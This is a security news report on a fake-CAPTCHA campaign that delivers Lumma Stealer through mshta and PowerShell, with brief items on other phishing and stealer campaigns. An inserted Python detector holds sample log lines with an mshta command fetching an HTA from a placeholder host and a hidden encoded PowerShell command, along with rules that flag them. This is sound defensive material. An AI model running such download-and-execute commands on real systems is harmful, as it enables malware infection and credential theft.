Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Strikes

Jan 23, 2025Ravie LakshmananPhishing / Malware

Cybersecurity researchers are calling attention to a new malware campaign that uses fake CAPTCHA verification checks to deliver the infamous Lumma information stealer.

“The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world,” Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a statement shared with The Hacker News.

“The campaign also spans multiple industries, including healthcare, banking, and marketing, with the telecom industry having the highest number of organizations targeted.”

The attack chain begins when a victim visits a compromised website, which redirects them to a fake CAPTCHA page that instructs the visitor to copy and paste a command into the Windows Run prompt. The command uses the native mshta.exe binary to download and execute an HTA file from a remote server.

It’s worth noting that a previous iteration of this technique, commonly known as , involved the execution of a Base64-encoded PowerShell script to trigger the Lumma Stealer infection.

The HTA file, in turn, executes a PowerShell command to launch a next-stage payload: a PowerShell script that unpacks a second PowerShell script responsible for decoding and loading the Lumma payload, but not before attempting to bypass the Windows Antimalware Scan Interface (AMSI) in an effort to evade detection.

By downloading and executing malware in this manner, the attacker avoids browser-based defenses, Fróes explained, because the victim performs all the necessary steps outside of the browser context.
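The chain described above leaves a distinctive process-creation trail that endpoint telemetry can catch. As an added example (not code from the article or from Netskope's report), the following Python detector runs three rules over constructed Sysmon-style process-creation lines: mshta.exe fetching an HTA over HTTP(S), mshta.exe launched from explorer.exe (assumed here to be the parent of commands typed into the Run prompt), and PowerShell spawned by mshta.exe with an encoded command. The log format, field names and sample lines are constructed for this example.

```python
from __future__ import annotations
import re

# Constructed sample events: "Key=value Key=value" lines loosely modelled on
# Sysmon process-creation fields. Events 0 and 1 mimic the fake-CAPTCHA chain;
# events 2 and 3 are benign and should produce no findings.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine=mshta http://example.invalid/verify.hta",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\mshta.exe CommandLine=powershell -w hidden -enc QQBCAEMA",
    r"Image=C:\Windows\System32\mshta.exe ParentImage=C:\Program Files\Vendor\setup.exe CommandLine=mshta C:\Program Files\Vendor\ui.hta",
    r"Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine=notepad.exe",
]

# A value runs until the next " Key=" token or end of line, so paths with spaces survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
# PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"\s-e(c|n|nc|ncodedcommand)?\b")


def parse_event(line: str) -> dict[str, str]:
    """Parse one constructed 'Key=value' event line into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (empty string if missing)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(line: str) -> list[str]:
    """Return the names of the rules that match a single process-creation event."""
    ev = parse_event(line)
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "").lower()
    hits: list[str] = []
    if image == "mshta.exe":
        if re.search(r"https?://", cmd):      # HTA pulled from a remote server
            hits.append("mshta_remote_hta")
        if parent == "explorer.exe":          # assumption: Run-prompt children are parented by explorer.exe
            hits.append("mshta_from_explorer")
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell_child_of_mshta")
    if image == "powershell.exe" and ENCODED_RE.search(cmd):
        hits.append("powershell_encoded_command")
    return hits


def scan(events: list[str]) -> list[tuple[int, list[str]]]:
    """Run every rule over a batch of events; return (index, hits) for those that match."""
    return [(i, detect(line)) for i, line in enumerate(events) if detect(line)]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, hits)
```

A single rule firing (for instance mshta.exe with a local HTA) is common in legitimate software, which is why event 2 stays silent; the chain is what matters, so correlate hits on the same host within a short window before alerting.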

“The Lumma Stealer operates using the malware-as-a-service (MaaS) model and has been extremely active in the past months. By using various delivery methods and payloads, especially when relying on user interactions within the system, it makes monitoring and blocking of such threats more complex.”

Lumma has also been distributed as recently as this month via roughly 1,000 fake domains that redirect users to download password-protected archives impersonating Reddit and WeTransfer.

According to Sekoia researcher crep1x, these archive files contain an AutoIT dropper dubbed SelfAU3 Dropper that executes the stealer. In early 2023, threat actors used a similar approach, setting up over 1,300 domains masquerading as AnyDesk, to deliver the Vidar Stealer malware.

In a new in-depth analysis of the stealer threat, Israeli security firm Cybereason highlighted its highly diverse infection vectors, including fake hacktools and comments on GitHub and YouTube.

Barracuda Networks reported an updated version of the phishing-as-a-service (PhaaS) toolkit that includes advanced features to “obstruct, derail, and otherwise thwart attempts by security tools to confirm its malicious intent and inspect its web pages.”

These include using legitimate, potentially compromised email addresses to send phishing emails, and taking a number of anti-analysis measures, such as detecting automated security scripts, listening for web-inspection keystrokes, and disabling the right-click context menu.

Social engineering-oriented credential harvesting attacks have also been observed abusing the avatar service Gravatar to mimic several reputable services such as AT&T, Comcast, Eastlink, Infinity, Kojeko, and Proton Mail.

“By exploiting Gravatar’s ‘Profiles as a Service,’ attackers create convincing fake profiles that mimic legitimate services, tricking users into divulging their credentials,” SlashNext Field CTO Stephen Kowski said.

“Attackers tailor their fake profiles more closely to the legitimate services they’re mimicking, through less well-known or less-protected services,” than generic phishing attempts do.
